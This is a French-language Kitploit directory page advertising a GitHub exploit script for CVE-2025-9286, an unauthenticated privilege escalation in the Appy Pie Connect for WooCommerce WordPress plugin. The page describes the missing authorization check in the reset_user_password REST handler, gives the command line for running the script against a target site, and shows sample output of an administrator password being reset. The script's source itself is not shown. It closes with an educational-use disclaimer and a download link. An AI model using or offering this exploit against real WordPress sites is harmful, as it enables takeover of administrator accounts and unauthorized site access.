Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-9286 — Appy Pie Connect pour WooCommerce <= 1.1.2 - Absence d'autorisation menant à une escalade de privilèges non authentifiée | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-9286
Escalade de PrivilègesAttaques de Mots de PasseExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2025-9286

CVE-2025-9286

Appy Pie Connect pour WooCommerce <= 1.1.2 - Absence d'autorisation menant à une escalade de privilèges non authentifiée

Voir le dépôt
il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-9286

Appy Pie Connect pour WooCommerce <= 1.1.2 - Autorisation manquante menant à une élévation de privilèges non authentifiée

⚠️ Appy Pie Connect pour WooCommerce <= 1.1.2 - Autorisation manquante menant à une élévation de privilèges non authentifiée via reset_user_password

📝 Description

Le plugin Appy Pie Connect pour WooCommerce pour WordPress est vulnérable à une élévation de privilèges en raison d'une autorisation manquante dans le gestionnaire REST reset_user_password() dans toutes les versions jusqu'à la version 1.1.2 incluse.
Cela permet à des attaquants non authentifiés de réinitialiser le mot de passe d'utilisateurs arbitraires, y compris les administrateurs, obtenant ainsi un accès administratif.

  • CVE: CVE-2025-9286
  • CVSS: 9.8 (Critique)

💻 Script d'exploitation

L'exploit suivant peut être utilisé pour exploiter CVE-2025-9286 sur les sites WordPress exécutant la version vulnérable du plugin.

Nom du script: CVE-2025-9286.py

⚙️ Utilisation

root@kitploit:~
python CVE-2025-9286.py -u http://nxploit.ddev.site/ -id 1

🟢 Exemple de sortie (Exploitation réussie)

root@kitploit:~
[+] Vérification de la version du plugin : http://nxploit.ddev.site/wp-content/plugins/appy-pie-connect-for-woocommerce/readme.txt
[!] Plugin vulnérable détecté (1.1.2). Tentative d'exploitation...
[*] Veuillez patienter, tentative de changement du mot de passe...
[+] Exploit réussi ! Le mot de passe a été réinitialisé.
[*] Nouveau mot de passe : Nxploited
[+] Vulnérabilité exploitée et mot de passe changé avec succès.

📬 Contact et communauté

  • 📨 Telegram : @Kxploit
  • 📡 Chaîne Telegram : @KNxploited

⚠️ Clause de non-responsabilité

Cet exploit est destiné exclusivement à des fins éducatives et de tests d'intrusion autorisés.
Toute utilisation non autorisée contre des systèmes sans autorisation explicite est illégale.
L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cet outil.


Par : Khaled Alenazi (Nxploited)

Télécharger l’outil